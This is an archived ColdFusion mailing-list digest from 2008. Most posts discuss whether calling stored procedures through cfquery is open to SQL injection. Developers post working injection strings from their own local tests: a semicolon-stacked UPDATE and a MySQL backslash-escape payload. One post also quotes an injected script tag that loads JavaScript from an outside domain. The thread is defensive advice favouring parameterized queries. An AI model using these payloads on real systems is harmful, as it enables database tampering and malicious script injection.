datasource=asdf storedproc '#var1#', '#var2#' cfquery I've read about using cfstored procs and params to prevent attacks. I've read that using cfquery and doing inline queries can cause injection attacks but I wasn't sure about using cfquery and calling a stored proc through it. Can somebody please confirm? Yes you are vulnerable if you do not sanitize the inputs. Actually, generally you won't be vulnerable here. You're calling a stored procedure, which is going to take your inputs and stick them in input parameters. As long as you're not executing strings directly in your stored procedure (using EXEC, EXECUTE, sp_executesql, etc) you'll be fine. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309494 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: cfquery and cfstoredproc
So I'm hearing that it should be fine?? Somehow their database columns values were appended the following string : /titleInvalidTag src=http://1.verynx.cn/w.js;/script!-- So for example the column firstname value was John became: John/titleInvalidTag src=http://1.verynx.cn/w.js;/script!-- What else could have caused this? Like you said the parameters are in single quotes and the data type is varchar so it must have a single quote in order to work. I'm confused... The specific attack in question looks for numeric inputs, not character inputs. So, my guess is that you have some other unparameterized query that is being called by the attack. I recommend you examine your codebase to find unparameterized queries. I found this tool, mentioned here by others, to be very helpful for this: http://qpscanner.riaforge.org/ Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309495 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: writing protected CF with CFStoredProc
The discussion yesterday regarding using CFqueryparam to protect sites from SQL Injection attacks got me thinking. Well, it is easy enough to use CFQUERYPARAM everywhere inside CFQUERY tags, wherever a variable is passed to the SQL query. However, how do you do that with CFStoredProc? If I understand correctly, if you want to protect calls to stored procs (from SQL injection and the like), you have to use cfstoredproc and cfprocparam instead of cfquery and cfqueryparam. But apparently, you can't indicate what parameters you're actually passing. Am I missing something? Say you had a proc that looked like this: CREATE PROC sps_testproc @AID int = null, @BID int = null as IF @AID is not null SELECT @AID IF @AID is not NULL SELECT @BID If I was using CFQUERY, unprotected-style, I might write this: cfquery ... sps_testproc cfif whichvar = A @aid=123 cfelse @bid=456 /cfif /cfquery Well, first of all, in this case the stored procedure itself is handling validation. It's going to make sure that @aid and @bid are integers, and fail if they're not. In addition, in the above case, the parameters don't even contain CF variables! So, you don't really need to go any farther, as your current code is safe. If I was using CFSTOREDPROC, I might write this: cfstoredproc procedure=sps_testproc... cfprocparam type=in cfsqltype=cf_sql_integer value=123 . /cfstoredproc See my problem? In my proc example, we don't need to know which of the two params is going to be passed to it. In the CFQUERY, I use that to pass one param or the other depending on something else (the value of whichvar). But as far as I can tell, CFSTOREDPROC doesn't let me tell it which parameter I'm passing -- presumably it wants all parameters, in order. So maybe I need something like this: cfstoredproc procedure=sps_testproc... cfif whichvar=A cfprocparam type=in cfsqltype=cf_sql_integer value=123 cfprocparam type=in cfsqltype=cf_sql_integer value=null cfelse cfprocparam type=in cfsqltype=cf_sql_integer value=null cfprocparam type=in cfsqltype=cf_sql_integer value=456 /cfstoredproc That kind of sucks, right? Am I making any sense? CF 5 and earlier used the DBVARNAME attribute to specify which one is which. My understanding is that JDBC doesn't support this, so CF no longer supports this either. However, I'm not knowledgeable enough about JDBC to confirm this, so maybe it's a DataDirect-specific issue. In any case, you need to send parameters in the order that they're expected by the stored procedure. That said, you can send NULLs to each parameter that allows it, and you could simplify the above code: cfstoredproc ... cfprocparam type=in cfsqltype=cf_sql_integer value=123 null=#YesNoFormat(whichvar neq A)# cfprocparam type=in cfsqltype=cf_sql_integer value=456 null=#YesNoFormat(whichvar eq A)# /cfstoredproc Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309496 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: cfquery and cfstoredproc
Dave, I never disagree with you (usually a fools errand) but I want a clarification. I think you might mean that this particular use is safe because CF will escape the single quotes. But the code below is vulnerable in exactly the same as a CFQUERY. As a test I created an SP - CREATE PROCEDURE dbo.sp_test @iObject varchar(200) as set nocount on select @iObject AS item Then I ran the following code: --- cfquery name=test datasource=test sp_test 'bob'; update coaches set name = 'Dave Watts' where coach_id = 1 /cfquery -- Both of these statements run and the coaches table was updated. So, yes it's protected in this case (because of escaping) but if the values were un sanitized integers it would be just as exposed as a regular query - right? If it looked like this: cfquery name=test datasource=test sp_test #bob_id# /cfquery I would be able to attack it I think. Probably not as easy to get the syntax right but... Still possible. Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 6:07 PM To: CF-Talk Subject: RE: cfquery and cfstoredproc What about a semi-colon? Storedproc '#var1#','#var2#' ; *other code* Would the CFQUERY not allow this additional code to run? It wouldn't allow any of the values after the stored procedure call storedproc to run as code, because they would be placed in the input parameters of the stored procedure. Essentially, this has the same effect as parameterizing your query in CF. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309497 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: ('1,1') * 1 = 39448
I should have spotted that: i noticed that the difference between 0,1 and
0,2 and 0,3 were 31, 29 and 31, etc. And also that the sequences jumped when
the numbers went from 12 to 13, and likewise around 30. And also leaps of
365 and 366 between 1,32 and 1,33 and 1,34 etc.
So CF is saying, well, 1,1 isn't a number, but might be a date, then getting
the number of days from 1 jan 1900 (or 30 dec 1988) to 1st Jan 2008 and use
that in the calculation.
Well, at least there is an explanation, but personally i can't see the point
in a feature which interprets 1,1 and 12,13 and 13,12 and 12,53 etc as
dates, and that any code which actively relied on such an abomination (as
oposed to falling victim to this feature) should be taken out and shot.
But looking on the bright side, we shouldn't have anymore customers getting
charged $1,143,992 for something they were expecting to pay $29 for...
Cheers
Bert
On Tue, Jul 22, 2008 at 5:43 PM, Experienced CF Developer
[EMAIL PROTECTED] wrote:
Looked like it could be a ColdFusion date value to me. So I did a
dateFormat() on that and came up with 01/01/2008:
cfset nValue = 1,1 * 1
cfoutput#dateFormat(nValue,mm/dd/)#brbr/cfoutput
It's assuming 1,1 is the current month and year. I did the same for
5,23 * 1 and got 05/23/2008.
What's really fun is if you do 1,1 * 2..
Go ahead... see what you get. 10/15/2116
Now go figure THAT one out!
Dave Phillips
-Original Message-
From: Bert Dawson [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 5:08 PM
To: CF-Talk
Subject: ('1,1') * 1 = 39448
I tracked down a defect to a piece of code which basically did the
following:
total = form.quantity * form.itemamount
In some cases, form.quantity is commong through as *1,1* which is
presumably
due to an HTML issue with duplicate form fields with the same name.
But rather than getting a CF error cos 1,1 isn't a number, it evaluates to
39448!
i.e.
cfoutput'1,1' * 1 = #'1,1' * 1#/cfoutput
produces:
'1,1' * 1 = 39448
I'm not worried about the original problem with the form.quantity coming
though as *1,1* rather than the expected *1* since I can fix that, but i'm
curious as to any reason for this odd result.
It looks like (x,y) * 1 is the same as (y,x) * 1
In other words
cfoutput#'5,23' * 1# = #'23,5' * 1# = 39591/cfoutput
As i say, i'm not worried about fixing the defect, but i'm just curious if
there is an underlying explanation for the apparently wierd behaviour. Or
is
it just a bug in the way CF does the conversion?
Cheers
Bert
p.s. FWIW here's a snippet which will create a 101 square grid of all the
combinations:
table border=1
cfloop from=0 to=100 index=i
tr
cfloop from=0 to=100 index=j
td nowrap=true#wtf(i,j)#/td
/cfloop
/tr
/cfloop
/table
cfscript
function wtf(a,b) {
var x = '#a#,#b#';
try {
return '#x#*1 = ' x*1;
}
catch(Any E) {
return '#x#*1 pukes';
}
}
/cfscript
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309498
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe:
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: cfquery and cfstoredproc
I never disagree with you (usually a fools errand) Ha! I wish. but I want a clarification. I think you might mean that this particular use is safe because CF will escape the single quotes. But the code below is vulnerable in exactly the same as a CFQUERY. As a test I created an SP - CREATE PROCEDURE dbo.sp_test @iObject varchar(200) as set nocount on select @iObject AS item Then I ran the following code: --- cfquery name=test datasource=test sp_test 'bob'; update coaches set name = 'Dave Watts' where coach_id = 1 /cfquery -- Both of these statements run and the coaches table was updated. Yeah, you're right about that. If you have a numeric value in your CFQUERY, it could be broken to also contain a string. The semicolon would turn the single original stored procedure call into an SQL batch containing the stored procedure and whatever your string contained. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309499 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: writing protected CF with CFStoredProc
Say you had a proc that looked like this: CREATE PROC sps_testproc @AID int = null, @BID int = null as IF @AID is not null SELECT @AID IF @AID is not NULL SELECT @BID If I was using CFQUERY, unprotected-style, I might write this: cfquery ... sps_testproc cfif whichvar = A @aid=123 cfelse @bid=456 /cfif /cfquery Well, first of all, in this case the stored procedure itself is handling validation. It's going to make sure that @aid and @bid are integers, and fail if they're not. In addition, in the above case, the parameters don't even contain CF variables! So, you don't really need to go any farther, as your current code is safe. As Mark just pointed out, if you did have actual CF variables in your statement, those would be vulnerable. The stored procedure itself isn't vulnerable, of course, but the CFQUERY tag would be unless you'd configured your database login so that it could only execute stored procedures. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309500 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: cfquery and cfstoredproc
So I'm hearing that it should be fine?? Somehow their database columns values were appended the following string : /titleInvalidTag src=http://1.verynx.cn/w.js;/script!-- So for example the column firstname value was John became: John/titleInvalidTag src=http://1.verynx.cn/w.js;/script!-- What else could have caused this? Like you said the parameters are in single quotes and the data type is varchar so it must have a single quote in order to work. I'm confused... The specific attack in question looks for numeric inputs, not character inputs. So, my guess is that you have some other unparameterized query that is being called by the attack. I recommend you examine your codebase to find unparameterized queries. I found this tool, mentioned here by others, to be very helpful for this: http://qpscanner.riaforge.org/ As Mark pointed out, if you did have numeric inputs in your CFQUERY tag, those would still be vulnerable. If not, though, the rest of my statement still stands. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309501 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: cfquery and cfstoredproc
Dave, Do you mind if I blog about that part where you said Yeah, your right about that That's got to be good for my cf_streetCred (ha). -mk -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 7:14 PM To: CF-Talk Subject: RE: cfquery and cfstoredproc I never disagree with you (usually a fools errand) Ha! I wish. but I want a clarification. I think you might mean that this particular use is safe because CF will escape the single quotes. But the code below is vulnerable in exactly the same as a CFQUERY. As a test I created an SP - CREATE PROCEDURE dbo.sp_test @iObject varchar(200) as set nocount on select @iObject AS item Then I ran the following code: --- cfquery name=test datasource=test sp_test 'bob'; update coaches set name = 'Dave Watts' where coach_id = 1 /cfquery -- Both of these statements run and the coaches table was updated. Yeah, you're right about that. If you have a numeric value in your CFQUERY, it could be broken to also contain a string. The semicolon would turn the single original stored procedure call into an SQL batch containing the stored procedure and whatever your string contained. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309502 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: do not increase counter is returns 0
Given the nature of this thread, ad hominid attacks is one of the best Freudian/spell check slip(s) in hominid history. ~G~ On Tue, Jul 22, 2008 at 10:11 AM, Adrian Lynch [EMAIL PROTECTED] wrote: Hominid: Any member of the biological family Hominidae (the great apes), including the extinct and extant humans, chimpanzees, gorillas, and orangutans. Thank you. Adrian :OD -Original Message- From: Brian Kotek [mailto:[EMAIL PROTECTED] Sent: 03 June 2008 21:08 To: CF-Talk Subject: Re: do not increase counter is returns 0 Thank you, Charlie. Yes, as you point out, I have tried over and over to explain things to Erik as well as reiterate that what he asks about are things that would be explained in the first few chapters of any book (or even website tutorial) on the subject. Instead, he absolutely refuses to try to learn himself and instead keeps on asking questions. Why? Because people keep answering them. I'm trying to help him AND the list because the current situation is harming both. But to be honest, the fact that Mr. Roberts misses the point completely and resorts to the very ad hominid attacks he condemns is not shocking in the slightest. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309503 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Doooh! I just got through cleaning the results of this attack out of a clients database! They have a very old CF application that was poorly written and has no cfqueryparams! I must have cleaned 10 tables so far... Funny part is, I warned my client several months ago after seeing evidence of a sql injection in his DB that he needed to at the very least purchase an application firewall to protect his sites. After running a trial of a popular application firewall he decided not to spend the money or try to deal with the ongoing tweaking required so that his site visitors are not effected by the firewall. Needless to say his security holes just cost him alot more money and down time due to this latest attach. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309504 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: cfquery and cfstoredproc
I'll admit it. The first time Dave conceded I was right about something, it got printed out and stuck on my cubicle wall. Hey, I gotta' celebrate *something* :) ~Brad - Original Message - From: Mark Kruger [EMAIL PROTECTED] To: CF-Talk cf-talk@houseoffusion.com Sent: Tuesday, July 22, 2008 8:58 PM Subject: RE: cfquery and cfstoredproc Dave, Do you mind if I blog about that part where you said Yeah, your right about that That's got to be good for my cf_streetCred (ha). -mk ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309505 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: cfquery and cfstoredproc
As Mark pointed out, if you did have numeric inputs in your CFQUERY tag,
those would still be vulnerable. If not, though, the rest of my statement
still stands.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Actually, I'm gonna pick on you again Dave and challenge this. (I'm hoping
to add to my wall)
If a someone is using MySQL, they have allowMultiQueries set to true and
have not changed the NO_BACKSLASH_ESCAPES from its default setting, the
example given would still be vulnerable to SQL injection. I set it up an
example locally just to make sure.
I created this MySQL proc:
CREATE PROCEDURE sp_test(input varchar(100))
BEGIN
select input;
END
Then call it with the following CFML (The contents of the var variable could
easily from from URL or FORM):
cfset var = Hello World\'); update links set active = yes; --
cfquery name=test datasource=foo
call sp_test('#var#');
/cfquery
You will notice that the input to the proc was enclosed in single ticks,
however SQL injection was still successful since MySQL allows for single
ticks to be escaped with a backslash and CF doesn't prevent that. (That
code updated all the records in my links table)
The OP didn't specify, but IF he is on another BDMS like MS SQL he would be
ok. however, I know MySQL is pretty common, and a lot of people run it in
allowMultiQueries mode.
~Brad
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309506
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Cold Fusion Project in DC
We have an immediate need for a Web Applications Developer. It will be a 3 month project working on several client projects. Position will be primarily based in the Alexandria, VA office, but that may change to DC Department of Transportation at the Navy Yard metro. Need to be able to go to either. $37 is pay maximum rate â let me know if thatâs doable. Requirements: Cold Fusion development/coding, dream weaver, MS Sql Server. Web application testing, and technical writing (user manuals, documentation.) 3-4 years of experience â ideally. Alicia N. Hamilton Director, Technology Contract Recruiting Services HireStrategy AOL IM - hireAliciaH http://www.linkedin.com/in/aliciahamilton Click here to view all Technology Positions [EMAIL PROTECTED] www.hirestrategy.com 11730 Plaza America Drive, Suite 340 Reston, VA 20190 (Office) 703-547-6729 (Fax) 703-707-1836 HireStrategy provides consulting services and executive search solutions in the technology, sales, human resources, and accounting professions. HireStrategy, an Inc. 500 company, is ranked by The Washington Business Journal as the #1 regional staffing firm in the Greater Washington area, and recognized by Washingtonian magazine, as one of Washington's Great Places to Work. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Jobs-Talk/message.cfm/messageid:3910 Subscription: http://www.houseoffusion.com/groups/CF-Jobs-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.11
